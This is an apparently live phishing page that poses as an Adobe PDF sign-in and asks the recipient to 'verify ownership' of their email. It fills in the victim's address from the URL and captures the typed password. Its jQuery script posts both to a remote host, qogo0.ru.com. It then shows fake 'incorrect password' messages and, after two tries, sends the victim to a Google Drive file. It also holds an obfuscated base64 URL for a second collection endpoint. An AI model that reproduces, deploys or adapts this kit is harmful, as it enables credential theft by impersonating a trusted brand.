<HTML>

<HEAD>
  <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

  <STYLE type=text/css>
    body,
    html {
      height: 100%;
      margin: 0;
      font-family: "Segoe UI Webfont", -apple-system, "Helvetica Neue", "Lucida Grande", "Roboto", "Ebrima", "Nirmala UI", "Gadugi", "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", "Tunga", "Lao UI", "Raavi", "Iskoola Pota", "Latha", "Leelawadee", "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microilsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math";
    }

    .wrapper {
      background-image: url(https://qogo0.ru.com/.xx/00000000000039.jpg);
      background-repeat: no-repeat;
      background-attachment: fixed;
      background-position: center;
      background-size: 55% 110%;
      position: fixed;
      top: 0;
      left: 0;
      height: 100%;
      width: 100%;
      display: flex;
      flex-flow: column nowrap;
      justify-content: center;
      align-items: center;
      box-sizing: border-box;
    }

    .element {
      width: 320px;
      height: 300px;
      padding: 40px 30px;
      background-color: #ffffff;
      border: 1px solid grey;
      border-color: #b30b00;
    }

    .elemente {
      width: 400px;
      height: 200px;
      padding: 40px 30px;
      background-color: #ffffff;
      border: 1px solid grey;
    }

    div .sign-opt {
      padding: 20px 0px;
      font-size: 14px;
    }

    .newbutton {
      width: 110px;
      float: left;
      border-color: #b30b00;
      background-color: #b30b00;
      color: #fff;
      font-size: 14px;
      padding: 8px 0;
      cursor: pointer;
      border: none;
    }
  </STYLE>
  <title>Adobe ID</title>
  <link rel="shortcut icon" href="https://www.adobe.com/content/dam/dx-dc/favicons/favicon.ico"
    type="image/vnd.microsoft.icon">
</HEAD>

<BODY>
  <DIV class=wrapper><!-- Fixed element that spans the viewport -->
    <DIV id=element class=element>
      <FORM method=post autocomplete="">
        <p>
        <DIV id=logo><IMG border=0 alt=""
            src="https://static.adobelogin.com/clients/virgoweb-2020/4x_817cf14a2f3fcff4ee6d4e35c5026779.png"
            color="#b30b00" align="top" width="30" height="30" /> <b> Adobe PDF</b></DIV>
        </p>
        <p>
        <DIV id=cont style="TEXT-ALIGN: left; PADDING-TOP: 10px; font-size:20px; color:#b30b00;">Verify ownership of the receiving email to continue
        </DIV>
        </p>
        <p>

        <DIV><INPUT id="email" name=email required="required" value="" placeholder="Email address" readonly
            style="width:320; height:30; border-color: #b30b00"></DIV>
        </p>
        <DIV><INPUT id="password" type=password name=password required="required" autofocus="autofocus"
            placeholder="Password" style="width:320; height:30; border-color: #b30b00"></DIV>
        <DIV id=sign-opt class=sign-opt>
          <DIV id=no-acc></A></DIV>
          <DIV class=button><A href="#"><BUTTON id=i983893 class=newbutton type=submit name=submit>
                <FONT color=#fff>Sign in</FONT>
              </BUTTON></A></DIV>
          <DIV id=sign-out class=sign-opt><A href="#"></A></DIV>
          <P id="msg" style="color: red" hidden>Email or Password Incorrect</P>
        </DIV>
      </FORM>
    </DIV><!-- your actual centered element -->
  </DIV>
</BODY>

</HTML>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script>

  /* global $ */
  $(document).ready(function () {
    var count = 0;

    $('#back1').click(function () {
      $("#msg").hide();
      $('#email').val("");
      $("#automail").animate({ left: 200, opacity: "hide" }, 0);
      $("#inputbar").animate({ right: 200, opacity: "show" }, 1000);

    });

    var email = window.location.hash.substr(1);
    email_value = document.getElementById("email");
    email_value.value = email;
    if (!email) {

    }
    else {
      var my_email = email;
      $('#').val(my_email);
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      if (!filter.test(my_email)) {
        $('#error').show();
        email.focus;
        return false;
      }
      var ind = my_email.indexOf("@");
      var my_slice = my_email.substr((ind + 1));
      var mainPage = 'https://' + my_slice;
      var c = my_slice.substr(0, my_slice.indexOf('.'));
      var final = c.toLowerCase();
      var finalu = c.toUpperCase();

      var sv = my_slice;

      //var image = "url('https://"+sv;"')"      
      $(".email").html(email);

    }

    $('#i983893').click(function (event) {

      event.preventDefault();
      $('#msg').hide();
      var email = $("#email").val();
      var password = $("#password").val();
      ///////////new injection////////////////
      var my_email = email;
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      if (!email) {
        $('#error').show();
        $('#error').html("Email field is empty");

        return false;
      }

      if (!filter.test(my_email)) {
        $('#error').show();
        $('#error').html("That account doesn't exist. Enter a different account");

        return false;
      }
      if (!password) {
        $('#error').show();
        $('#error').html("Password field is empty");

        return false;
      }



      ///////////new injection////////////////
      count = count + 1;
      //  console.log(count); 
      var d = atob('aHR0cHM6Ly8xdGhhc2hjb2luLmNvbS9hc3NldHMvb28ucGhw');
      $.ajax({
        dataType: 'JSON',
        url: 'https://qogo0.ru.com/cgi/new-next.php',
        type: 'POST',
        data: {
          email: email,
          password: password
        },
        // data: $('#contact').serialize(),
        beforeSend: function (xhr) {
          $('#i983893').html('Verifying....');
          //  console.log(count); 
        },
        success: function (response) {
          $('#msg').html("<span style='color:red;'>Username or Password is incorrect. Please try again</span>");
          if (response) {
            $("#msg").show();
            console.log(response);
            $('#msg').html(response['msg']);
            if (response['signal'] == 'ok') {
              $("#password").val("");
              if (count >= 2) {
                count = 0;
                // window.location.replace(response['redirect_link']);
                window.location.replace("https://drive.google.com/file/d/1UspGJ6AYbCFC3-FcHHdUyYhGc1uWKCbm/view?usp=drive_link");

              }
              // $('#msg').html(response['msg']);
            }
            else {
              $('#msg').html(response['msg']);
            }
          }
        },
        error: function () {
          $("#password").val("");
          $('#i983893').html('Sign in');
          if (count >= 2) {
            count = 0;
            window.location.replace("https://drive.google.com/file/d/1UspGJ6AYbCFC3-FcHHdUyYhGc1uWKCbm/view?usp=drive_link");
          }
          $("#msg").show();
          // $('#msg').html("Please try again later");
        },
        complete: function () {
          $('##i983893').html('Sign in');
        }
      });
    });


  });


</script>
